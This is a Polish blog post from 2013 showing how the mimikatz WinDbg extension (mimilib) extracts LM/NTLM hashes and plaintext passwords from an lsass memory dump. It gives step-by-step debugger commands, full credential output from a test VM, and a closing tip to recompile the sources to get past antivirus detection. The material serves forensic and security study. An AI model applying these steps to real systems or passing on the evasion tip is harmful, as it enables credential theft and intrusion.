Zine.net online

Witaj na Zine.net online Zaloguj się | Rejestracja | Pomoc
w Szukaj

mgrzeg.net - Admin on Rails :)

mimilib.dll - mimikatz a WinDbg

Benjamin kontynuuje swoją pracę nad narzędziami do analizy lsass, czego owocem jest udostępniona dziś biblioteka rozszerzeń dla WinDbg, która - podobnie jak opisywany przeze mnie wcześniej mimikatz - pozwala na wyciąganie informacji ze zrzutów pamięci systemu.

1. Ładujemy dump i szukamy lsass.exe

kd> !process 0 0 lsass.exe
PROCESS 862c0b20  SessionId: 0  Cid: 0210    Peb: 7ffd4000  ParentCid: 0198
    DirBase: 7ec410e0  ObjectTable: 89e43ef0  HandleCount: 519.
    Image: lsass.exe

2 Ustawiamy kontekst na znaleziony proces

kd> .process /r /p 862c0b20 
Implicit process is now 862c0b20
Loading User Symbols
............................................................

3. Ładujemy mimilib

kd> .load mimilib

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 25 2013 11:42:09)
 .## ^ ##.  Windows build 7600
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` (
benjamin@gentilkiwi.com )
 '## v ##'  
http://blog.gentilkiwi.com/mimikatz
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

I w końcu uruchamiamy odpowiednią funkcję rozszerzającą windbg, która grzecznie zwraca nam to, co zgubiliśmy:

kd> !mimikatz

Authentication Id : 0 ; 81867 (00000000:00013fcb)
Session           : Interactive from 1
User Name         : Admin
Domain            : W7PROFENX86VM
 msv :
  [00000003] Primary
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * LM       : 65c566d5eff8de4419d6c07b4d0a41ef
  * NTLM     : e4f1ba73165d937c5fc709517e604d73
 tspkg :
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * Password : Pa$$w0rd
 wdigest :
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * Password : Pa$$w0rd
 kerberos :
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * Password : Pa$$w0rd
 ssp :

Authentication Id : 0 ; 81822 (00000000:00013f9e)
Session           : Interactive from 1
User Name         : Admin
Domain            : W7PROFENX86VM
 msv :
  [00000003] Primary
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * LM       : 65c566d5eff8de4419d6c07b4d0a41ef
  * NTLM     : e4f1ba73165d937c5fc709517e604d73
 tspkg :
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * Password : Pa$$w0rd
 wdigest :
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * Password : Pa$$w0rd
 kerberos :
  * Username : Admin
  * Domain   : W7PROFENX86VM
  * Password : Pa$$w0rd
 ssp :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
 msv :
 tspkg : KO
 wdigest :
  * Username : (null)
  * Domain   : (null)
  * Password : (null)
 kerberos :
  * Username : (null)
  * Domain   : (null)
  * Password : (null)
 ssp :
  [00000000]
  [00000001]

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : W7PROFENX86VM$
Domain            : WORKGROUP
 msv :
 tspkg : KO
 wdigest :
  * Username : W7PROFENX86VM$
  * Domain   : WORKGROUP
  * Password : (null)
 kerberos :
  * Username : w7profenx86vm$
  * Domain   : WORKGROUP
  * Password : (null)
 ssp :
  [00000000]

Drobne ostrzeżenie - udostępniona przez Benjamina biblioteka jest już rozpoznawana przez programy antywirusowe, ale wystarczy samodzielnie przekompilować źródła, aby móc cieszyć się nowym narzędziem :)

Opublikowane 25 listopada 2013 15:43 przez mgrzeg
Filed under: , ,

Powiadamianie o komentarzach

Jeżeli chciałbyś otrzymywać email gdy ta wypowiedź zostanie zaktualizowana, to zarejestruj się tutaj

Subskrybuj komentarze za pomocą RSS

Komentarze:

 

Polski TechNet Blog said:

Kiedyś, mój ówczesny szef, przedstawiając mnie współpracownikom powiedział, że używam wyszukiwarek tylko

grudnia 13, 2013 16:41
 

Driver Verifier | Polski TechNet Blog said:

kwietnia 29, 2016 14:44

Co o tym myślisz?

(wymagane) 
(opcjonalne)
(wymagane) 

  
Wprowadź kod: (wymagane)
Wyślij

Subskrypcje

W oparciu o Community Server (Personal Edition), Telligent Systems